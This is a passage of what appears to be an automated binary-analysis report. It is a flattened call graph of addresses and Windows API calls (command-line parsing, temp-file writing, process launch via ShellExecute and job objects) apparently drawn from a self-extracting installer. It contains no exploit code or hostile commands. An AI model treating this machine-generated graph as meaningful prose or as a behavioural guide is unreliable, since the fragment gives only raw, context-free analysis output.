9832->9833 9834 4041f8 20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10092 40241d 9835->10092 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10101 4048a9 9845->10101 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10111 404f67 9860->10111 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9886 401458 2 API calls 9886->9887 9887->9882 9887->9886 9888 401526 ??2@YAPAXI ??3@YAXPAX 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 402823 2 API calls 9965->9966 9982 403415 9966->9982 9967 4036b4 ??3@YAXPAX 9968 4036eb 9967->9968 9968->9608 9968->9613 9969 401458 ??2@YAPAXI ??3@YAXPAX 9969->9982 9970 402823 2 API calls 9970->9982 9971 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9971->9982 9972 4013a9 2 API calls 9973 403486 ??3@YAXPAX ??3@YAXPAX 9972->9973 9974 4036c0 9973->9974 9973->9982 10535 402d30 9974->10535 9978 4036e1 ??3@YAXPAX 9978->9968 9979 403593 strncmp 9981 40357e strncmp 9979->9981 9979->9982 9981->9979 9981->9982 9982->9967 9982->9969 9982->9970 9982->9971 9982->9972 9982->9974 9982->9979 9984 40292b ??2@YAPAXI ??3@YAXPAX 9982->9984 9985 4013a9 2 API calls 9982->9985 9986 40292b 2 API calls 9982->9986 9990 403648 lstrlenW wcsncmp 9982->9990 9992 4032d9 7 API calls 9982->9992 9993 401370 2 API calls 9982->9993 10526 402662 9982->10526 10530 40261a 9982->10530 10534 40269a ??3@YAXPAX ??3@YAXPAX 9982->10534 9984->9982 9987 403600 ??3@YAXPAX 9985->9987 9986->9981 9988 402dd6 9 API calls 9987->9988 9989 403611 lstrcmpW 9988->9989 9989->9982 9990->9982 9992->9982 9993->9982 9995 4026b0 lstrcmpW 9994->9995 9996 404b1f 9995->9996 9997 404b6f 9996->9997 9999 401370 2 API calls 9996->9999 9998 4026b0 lstrcmpW 9997->9998 10000 404b8d 9998->10000 10001 404b36 9999->10001 10003 4026b0 lstrcmpW 10000->10003 10002 402187 19 API calls 10001->10002 10004 404b3d 10002->10004 10005 404ba5 10003->10005 10006 4027c2 2 API calls 10004->10006 10008 4026b0 lstrcmpW 10005->10008 10007 404b46 10006->10007 10009 401370 2 API calls 10007->10009 10010 404bbd 10008->10010 10011 404b5f 10009->10011 10013 4026b0 lstrcmpW 10010->10013 10012 402187 19 API calls 10011->10012 10014 404b66 10012->10014 10015 404bd5 10013->10015 10016 4027c2 2 API calls 10014->10016 10017 404bec 10015->10017 10018 404bdc lstrcmpiW 10015->10018 10016->9997 10019 4026b0 lstrcmpW 10017->10019 10018->10017 10020 404c02 10019->10020 10021 4026b0 lstrcmpW 10020->10021 10022 404c2f 10021->10022 10023 404c3c 10022->10023 10554 4043a6 10022->10554 10025 4026b0 lstrcmpW 10023->10025 10029 404c50 10025->10029 10026 404c70 10028 4026b0 lstrcmpW 10026->10028 10035 404c83 10028->10035 10029->10026 10030 4026b0 lstrcmpW 10029->10030 10558 40434d 10029->10558 10030->10029 10031 404ca3 10032 4026b0 lstrcmpW 10031->10032 10034 404caf 10032->10034 10036 4026b0 lstrcmpW 10034->10036 10035->10031 10037 4026b0 lstrcmpW 10035->10037 10562 40437e 10035->10562 10038 404cc0 10036->10038 10037->10035 10039 4026b0 lstrcmpW 10038->10039 10040 404cd1 10039->10040 10041 404ce7 10040->10041 10042 404cde _wtol 10040->10042 10043 4026b0 lstrcmpW 10041->10043 10042->10041 10044 404cf3 10043->10044 10045 404d03 10044->10045 10046 404cfa _wtol 10044->10046 10047 4026b0 lstrcmpW 10045->10047 10046->10045 10048 404d0f 10047->10048 10049 4026b0 lstrcmpW 10048->10049 10050 404d27 10049->10050 10051 4026b0 lstrcmpW 10050->10051 10052 404d3f 10051->10052 10052->9675 10054 40261a lstrcmpW 10053->10054 10055 4026c1 10054->10055 10055->9682 10057 404648 10056->10057 10059 404605 10056->10059 10057->9644 10057->9645 10058 40133e 2 API calls 10058->10059 10059->10058 10060 4041f8 20 API calls 10059->10060 10061 404622 SetEnvironmentVariableW ??3@YAXPAX 10060->10061 10061->10057 10061->10059 10063 401458 2 API calls 10062->10063 10064 404556 10063->10064 10065 4027aa 2 API calls 10064->10065 10066 40455f GetTempPathW 10065->10066 10067 404578 10066->10067 10072 40458f 10066->10072 10068 4027aa 2 API calls 10067->10068 10069 404583 GetTempPathW 10068->10069 10069->10072 10070 4027aa 2 API calls 10071 4045b2 wsprintfW 10070->10071 10071->10072 10072->10070 10073 4045c9 GetFileAttributesW 10072->10073 10074 4045ed 10072->10074 10073->10072 10073->10074 10074->9722 10076 401745 10075->10076 10091 40d041 3 API calls 10076->10091 10077 401769 10078 401794 10077->10078 10570 40110a 10077->10570 10080 408dbf 57 API calls 10078->10080 10084 40179c 10080->10084 10082 4017bc 10083 4017d4 ??2@YAPAXI 10082->10083 10085 4036f1 88 API calls 10082->10085 10086 4017e0 10083->10086 10087 4017e7 10083->10087 10084->9739 10088 4017cf 10085->10088 10593 401470 10086->10593 10574 401611 10087->10574 10088->10083 10088->10084 10091->10077 10093 402426 10092->10093 10094 40242b 10092->10094 10093->9840 10095 40236f 3 API calls 10094->10095 10096 402430 10095->10096 10097 402441 10096->10097 10098 40243a 10096->10098 10097->9840 11011 4023e9 LoadLibraryA GetProcAddress 10098->11011 10102 4044c6 2 API calls 10101->10102 10103 4048b7 10102->10103 10104 401429 2 API calls 10103->10104 10105 4048c2 10104->10105 10106 4048c7 10105->10106 10107 40133e 2 API calls 10106->10107 10108 4048d5 10107->10108 10109 4027c2 2 API calls 10108->10109 10110 4048e0 10109->10110 10110->9858 10112 401458 2 API calls 10111->10112 10113 404f78 10112->10113 10114 401458 2 API calls 10113->10114 10115 404f80 memset 10114->10115 10116 404fae 10115->10116 10117 404a97 2 API calls 10116->10117 10118 404fd1 10117->10118 10119 401370 2 API calls 10118->10119 10120 404fdc 10119->10120 10121 404fe1 ??3@YAXPAX 10120->10121 10122 404ffa ShellExecuteExW 10120->10122 10123 404fec ??3@YAXPAX 10121->10123 10124 405014 10122->10124 10125 40503a 10122->10125 10123->9864 10126 405028 CloseHandle 10124->10126 10127 40501d WaitForSingleObject 10124->10127 10128 405031 ??3@YAXPAX 10125->10128 10126->10128 10127->10126 10128->10123 10130 407c87 4 API calls 10129->10130 10131 404eb5 10130->10131 10132 402187 19 API calls 10131->10132 10133 404ec3 10132->10133 10134 402771 2 API calls 10133->10134 10135 404ecd 10134->10135 10136 404f03 wsprintfW 10135->10136 10138 4027c2 ??2@YAPAXI ??3@YAXPAX 10135->10138 10137 4027c2 2 API calls 10136->10137 10139 404f31 10137->10139 10138->10135 10140 4027c2 2 API calls 10139->10140 10141 404f3e 10140->10141 10142 407ce8 22 API calls 10141->10142 10143 404f53 ??3@YAXPAX 10142->10143 11013 407a5b ??3@YAXPAX 10143->11013 10145 404f64 10145->9563 10147 40cdda ctype 3 API calls 10146->10147 10148 404521 10147->10148 10149 40ccfd ctype 3 API calls 10148->10149 10150 40ce45 ??3@YAXPAX 10149->10150 10150->9551 10152 4052b4 10151->10152 10158 4052d0 10151->10158 10155 4052c6 _wtol 10152->10155 10152->10158 10153 404f67 9 API calls 10154 4052f3 10153->10154 10156 405301 10154->10156 10157 4052fb GetLastError 10154->10157 10155->10158 10156->9563 10157->10156 10158->10153 10160 40ca5c 2 API calls 10159->10160 10161 4054ed 10160->10161 10162 405549 10161->10162 10164 402771 2 API calls 10161->10164 10163 402823 2 API calls 10162->10163 10165 405551 10163->10165 10170 4054fc 10164->10170 10166 4028b9 2 API calls 10165->10166 10167 40555e 10166->10167 10168 402953 2 API calls 10167->10168 10172 40556b 10168->10172 10169 4055ba ??3@YAXPAX 10175 4055b6 10169->10175 10170->10169 10171 4036f1 88 API calls 10170->10171 10173 405520 10171->10173 10174 402953 2 API calls 10172->10174 10173->10169 10177 40ca5c 2 API calls 10173->10177 10176 405578 10174->10176 10175->9620 10178 402953 2 API calls 10176->10178 10180 40553c 10177->10180 10179 405585 10178->10179 10181 40d0a5 2 API calls 10179->10181 10180->10169 10182 405540 ??3@YAXPAX 10180->10182 10183 405599 10181->10183 10182->10162 10183->10169 10184 4055a2 ??3@YAXPAX 10183->10184 10184->10175 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 4050f9 10336->10337 10338 4048c7 2 API calls 10337->10338 10339 405106 10338->10339 10340 4048c7 2 API calls 10339->10340 10341 405113 10340->10341 10342 4013a9 2 API calls 10341->10342 10343 40511f 12 API calls 10342->10343 10344 4051b4 GetLastError 10343->10344 10345 4051d7 CreateJobObjectW 10343->10345 10346 4051bc ??3@YAXPAX ??3@YAXPAX 10344->10346 10347 405252 ResumeThread WaitForSingleObject 10345->10347 10348 4051ef AssignProcessToJobObject 10345->10348 10346->9850 10350 405262 CloseHandle GetExitCodeProcess 10347->10350 10348->10347 10349 4051fd CreateIoCompletionPort 10348->10349 10349->10347 10351 40520f SetInformationJobObject ResumeThread 10349->10351 10352 405288 CloseHandle 10350->10352 10353 40527f GetLastError 10350->10353 10356 40523d GetQueuedCompletionStatus 10351->10356 10354 405291 CloseHandle 10352->10354 10355 405294 10352->10355 10353->10352 10354->10355 10357 40529a CloseHandle 10355->10357 10358 40529f 10355->10358 10356->10347 10359 405237 10356->10359 10357->10358 10358->10346 10359->10350 10359->10356 10361 4023d9 10360->10361 10362 4023be LoadLibraryA GetProcAddress 10360->10362 10361->9836 10362->10361 10364 401458 2 API calls 10363->10364 10372 404dbf 10364->10372 10365 401370 2 API calls 10365->10372 10366 404e51 10367 404e8b ??3@YAXPAX 10366->10367 10369 404dae 3 API calls 10366->10369 10367->9791 10368 401526 2 API calls 10368->10372 10371 404e88 10369->10371 10370 4026b0 lstrcmpW 10370->10372 10371->10367 10372->10365 10372->10366 10372->10368 10372->10370 10374 407c87 4 API calls 10373->10374 10375 40449f 10374->10375 10375->9766 10376->9749 10378 4054b6 ??3@YAXPAX 10377->10378 10379 40531a 10377->10379 10381 4054bc 10378->10381 10379->10378 10380 40532e GetDriveTypeW 10379->10380 10380->10378 10382 40535a 10380->10382 10381->9752 10383 404545 6 API calls 10382->10383 10384 405368 CreateFileW 10383->10384 10385 405480 ??3@YAXPAX ??3@YAXPAX 10384->10385 10386 40538e 10384->10386 10385->10381 10387 401458 2 API calls 10386->10387 10388 405397 10387->10388 10389 401370 2 API calls 10388->10389 10390 4053a4 10389->10390 10391 4027c2 2 API calls 10390->10391 10392 4053b2 10391->10392 10393 401429 2 API calls 10392->10393 10394 4053be 10393->10394 10395 4027c2 2 API calls 10394->10395 10396 4053cc 10395->10396 10397 4027c2 2 API calls 10396->10397 10398 4053d9 10397->10398 10399 401429 2 API calls 10398->10399 10400 4053e5 10399->10400 10401 4027c2 2 API calls 10400->10401 10402 4053f2 10401->10402 10403 4027c2 2 API calls 10402->10403 10404 4053fb 10403->10404 10405 401429 2 API calls 10404->10405 10406 405407 10405->10406 10407 4027c2 2 API calls 10406->10407 10408 405410 10407->10408 10409 402b20 3 API calls 10408->10409 10410 405422 WriteFile ??3@YAXPAX CloseHandle 10409->10410 10411 405450 10410->10411 10412 405491 10410->10412 10411->10412 10413 405458 SetFileAttributesW ShellExecuteW ??3@YAXPAX 10411->10413 10414 402ff3 16 API calls 10412->10414 10413->10385 10415 405499 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10414->10415 10415->10381 10425 40250f 10416->10425 10420 401458 2 API calls 10419->10420 10421 402ae4 10420->10421 10422 402b1c 10421->10422 10423 4027aa 2 API calls 10421->10423 10422->9887 10424 402b01 MultiByteToWideChar 10423->10424 10424->10422 10426 402549 10425->10426 10427 40251d ??2@YAPAXI 10425->10427 10426->9887 10427->10426 10428 40252e ??3@YAXPAX 10427->10428 10428->10426 10431 401cc2 10430->10431 10433 401c82 10430->10433 10431->9897 10432 40ccb4 CharUpperW 10432->10433 10433->10431 10433->10432 10434 401ccf 10433->10434 10438 40ccb4 CharUpperW 10434->10438 10436 401cdf 10439 40ccb4 CharUpperW 10436->10439 10438->10436 10439->10431 10440->9921 10442 402390 GetNativeSystemInfo 10441->10442 10443 40239c 10441->10443 10442->9927 10443->9927 10447 40c998 10444->10447 10448 40c95f 2 API calls 10447->10448 10449 405be0 10448->10449 10449->9591 10449->9592 10500 4028b9 10450->10500 10453 4028b9 2 API calls 10454 403bc9 10453->10454 10504 402a0d 10454->10504 10457 4028f3 2 API calls 10458 403be6 ??3@YAXPAX 10457->10458 10459 402a0d 3 API calls 10458->10459 10460 403c01 10459->10460 10461 4028f3 2 API calls 10460->10461 10462 403c0c ??3@YAXPAX 10461->10462 10463 403c22 10462->10463 10464 403c4c 10462->10464 10463->10464 10465 403c27 wsprintfA 10463->10465 10466 403c52 wsprintfA 10464->10466 10467 403c79 10464->10467 10468 402953 2 API calls 10465->10468 10469 402953 2 API calls 10466->10469 10470 402953 2 API calls 10467->10470 10472 403c41 10468->10472 10473 403c6e 10469->10473 10471 403c86 10470->10471 10474 402953 2 API calls 10471->10474 10475 402953 2 API calls 10472->10475 10476 402953 2 API calls 10473->10476 10477 403c8e 10474->10477 10475->10464 10476->10467 10478 402bee 10477->10478 10479 402bfb 10478->10479 10487 40d041 3 API calls 10479->10487 10480 402c0d lstrlenA lstrlenA 10482 402c3a 10480->10482 10481 402d18 10489 4028f3 10481->10489 10482->10481 10483 402ce5 memmove 10482->10483 10484 402c85 memcmp 10482->10484 10485 402cc2 memcmp 10482->10485 10488 40d00d GetLastError 10482->10488 10519 40292b 10482->10519 10483->10481 10483->10482 10484->10481 10484->10482 10485->10482 10487->10480 10488->10482 10490 4028ff 10489->10490 10492 402910 10489->10492 10491 40250f 2 API calls 10490->10491 10491->10492 10492->9948 10494 40255b 2 API calls 10493->10494 10495 402999 10494->10495 10495->9962 10497 402962 10496->10497 10498 40255b 2 API calls 10497->10498 10499 40296f 10498->10499 10499->9948 10501 4028cf 10500->10501 10502 40250f 2 API calls 10501->10502 10503 4028dc 10502->10503 10503->10453 10505 402a28 10504->10505 10506 402a3f 10505->10506 10507 402a34 10505->10507 10508 402823 2 API calls 10506->10508 10516 40286b 10507->10516 10510 402a48 10508->10510 10511 40250f 2 API calls 10510->10511 10513 402a51 10511->10513 10512 402a3d 10512->10457 10514 40286b 2 API calls 10513->10514 10515 402a7f ??3@YAXPAX 10514->10515 10515->10512 10517 40250f 2 API calls 10516->10517 10518 402886 10517->10518 10518->10512 10522 40255b 10519->10522 10523 40259f 10522->10523 10524 40256f 10522->10524 10523->10482 10525 40250f 2 API calls 10524->10525 10525->10523 10527 402697 10526->10527 10528 40266f lstrcmpW 10526->10528 10527->9982 10529 402686 10528->10529 10529->10527 10529->10528 10533 402625 10530->10533 10531 402631 lstrcmpW 10532 40264e 10531->10532 10531->10533 10532->9982 10533->10531 10533->10532 10534->9982 10536 402d4b 10535->10536 10537 402d3f 10535->10537 10539 402823 2 API calls 10536->10539 10553 401bdf GetStdHandle WriteFile 10537->10553 10541 402d55 10539->10541 10540 402d46 10552 40269a ??3@YAXPAX ??3@YAXPAX 10540->10552 10542 402d80 10541->10542 10547 40292b 2 API calls 10541->10547 10543 402ad8 3 API calls 10542->10543 10544 402d92 10543->10544 10545 402da0 10544->10545 10546 402db4 10544->10546 10548 408dbf 57 API calls 10545->10548 10549 408dbf 57 API calls 10546->10549 10547->10541 10550 402daf ??3@YAXPAX ??3@YAXPAX 10548->10550 10549->10550 10550->10540 10552->9978 10553->10540 10555 4043c4 10554->10555 10566 4042ea 10555->10566 10559 40435a 10558->10559 10560 4042ea _wtol 10559->10560 10561 40437b 10560->10561 10561->10029 10563 40438b 10562->10563 10564 4042ea _wtol 10563->10564 10565 4043a3 10564->10565 10565->10035 10567 4042f4 10566->10567 10568 40430f _wtol 10567->10568 10569 404348 10567->10569 10568->10567 10569->10023 10598 410e26 10570->10598 10606 410329 _EH_prolog 10570->10606 10571 40112a 10571->10078 10571->10082 10575 401624 10574->10575 10576 401370 2 API calls 10575->10576 10577 401631 10576->10577 10578 401526 2 API calls 10577->10578 10579 40163a CreateThread 10578->10579 10580 401669 10579->10580 10581 40166e WaitForSingleObject 10579->10581 11005 4012e3 10579->11005 10582 40851f 25 API calls 10580->10582 10583 40168b 10581->10583 10584 4016bd 10581->10584 10582->10581 10587 4016a9 10583->10587 10589 40169a 10583->10589 10585 4016b9 10584->10585 10586 4016c5 GetExitCodeThread 10584->10586 10585->10084 10588 4016dc 10586->10588 10590 408dbf 57 API calls 10587->10590 10588->10585 10588->10589 10591 40170b SetLastError 10588->10591 10589->10585 10592 408dbf 57 API calls 10589->10592 10590->10585 10591->10589 10592->10585 10594 401458 2 API calls 10593->10594 10595 401489 10594->10595 10596 401458 2 API calls 10595->10596 10597 401495 10596->10597 10597->10087 10599 410e38 10598->10599 10605 40d041 3 API calls 10599->10605 10600 410e4c 10603 410e83 10600->10603 10604 40d041 3 API calls 10600->10604 10601 410e60 10601->10603 10622 410ccb 10601->10622 10603->10571 10604->10601 10605->10600 10607 410349 10606->10607 10608 410e26 11 API calls 10607->10608 10609 41036e 10608->10609 10610 410390 10609->10610 10611 410377 10609->10611 10650 4127aa _EH_prolog 10610->10650 10653 40ff49 10611->10653 10635 40e0d0 10622->10635 10624 410cf7 10624->10603 10625 410ce3 10625->10624 10638 40e036 10625->10638 10628 410d30 10629 410dc4 ??3@YAXPAX 10628->10629 10630 410dcf ??3@YAXPAX 10628->10630 10632 410dad memmove 10628->10632 10633 410dd9 memcpy 10628->10633 10629->10624 10630->10624 10632->10628 10634 40d041 3 API calls 10633->10634 10634->10630 10646 40e085 10635->10646 10639 40e080 memcpy 10638->10639 10640 40e043 10638->10640 10639->10628 10641 40e048 ??2@YAPAXI 10640->10641 10642 40e06e 10640->10642 10643 40e070 ??3@YAXPAX 10641->10643 10644 40e058 memmove 10641->10644 10642->10643 10643->10639 10644->10643 10647 40e0c9 10646->10647 10648 40e097 10646->10648 10647->10625 10648->10647 10649 40d00d GetLastError 10648->10649 10649->10648 10661 412525 10650->10661 10988 40fdd9 10653->10988 10683 40fc0a 10661->10683 10806 40fb7b 10683->10806 10807 40cdda ctype 3 API calls 10806->10807 10808 40fb84 10807->10808 10809 40cdda ctype 3 API calls 10808->10809 10810 40fb8c 10809->10810 10811 40cdda ctype 3 API calls 10810->10811 10812 40fb94 10811->10812 10813 40cdda ctype 3 API calls 10812->10813 10814 40fb9c 10813->10814 10815 40cdda ctype 3 API calls 10814->10815 10816 40fba4 10815->10816 10817 40cdda ctype 3 API calls 10816->10817 10818 40fbac 10817->10818 10819 40cdda ctype 3 API calls 10818->10819 10820 40fbb6 10819->10820 10821 40cdda ctype 3 API calls 10820->10821 10822 40fbbe 10821->10822 10823 40cdda ctype 3 API calls 10822->10823 10824 40fbcb 10823->10824 10825 40cdda ctype 3 API calls 10824->10825 10826 40fbd3 10825->10826 10827 40cdda ctype 3 API calls 10826->10827 10828 40fbe0 10827->10828 10829 40cdda ctype 3 API calls 10828->10829 10830 40fbe8 10829->10830 10831 40cdda ctype 3 API calls 10830->10831 10832 40fbf5 10831->10832 10833 40cdda ctype 3 API calls 10832->10833 10834 40fbfd 10833->10834 10989 40cdda ctype 3 API calls 10988->10989 10990 40fde7 10989->10990 11006 4012ec 11005->11006 11007 4012ff 11005->11007 11006->11007 11008 4012ee Sleep 11006->11008 11009 401338 11007->11009 11010 40132a EndDialog 11007->11010 11008->11006 11010->11009 11012 40240b 11011->11012 11012->10093 11013->10145 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile
                                                      APIs
                                                      • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                        • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
